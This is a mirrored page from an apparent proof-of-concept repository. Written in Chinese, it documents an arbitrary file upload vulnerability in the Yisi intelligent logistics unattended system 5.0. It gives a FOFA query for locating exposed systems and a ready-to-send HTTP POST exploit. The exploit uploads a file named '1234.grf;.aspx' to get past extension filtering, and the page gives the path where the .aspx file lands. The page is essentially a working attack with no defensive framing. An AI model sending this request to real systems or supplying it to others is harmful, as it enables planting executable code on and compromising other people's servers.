mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
28 lines
702 B
Markdown
28 lines
702 B
Markdown
|
## 易思智能物流无人值守系统5.0存在任意文件上传漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```
|
||
|
|
"智能物流无人值守系统"
|
||
|
|
```
|
||
|
|
|
||
|
|
## exp
|
||
|
|
```
|
||
|
|
POST /Sys_ReportFile/ImportReport?encode=717132 HTTP/1.1
|
||
|
|
Host: 127.0.0.1
|
||
|
|
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Accept: */*
|
||
|
|
Connection: close
|
||
|
|
Content-Length: 199
|
||
|
|
Content-Type: multipart/form-data; boundary=59d3d0b126080d21572c9e7a77d89931
|
||
|
|
|
||
|
|
--59d3d0b126080d21572c9e7a77d89931
|
||
|
|
Content-Disposition: form-data; name="file"; filename="1234.grf;.aspx"
|
||
|
|
Content-Type: application/octet-stream
|
||
|
|
|
||
|
|
304674859
|
||
|
|
--59d3d0b126080d21572c9e7a77d89931--
|
||
|
|
```
|
||
|
|
|
||
|
|
上传成功后,会返回路径 http://127.0.0.1/GRF/Custom/717132.aspx
|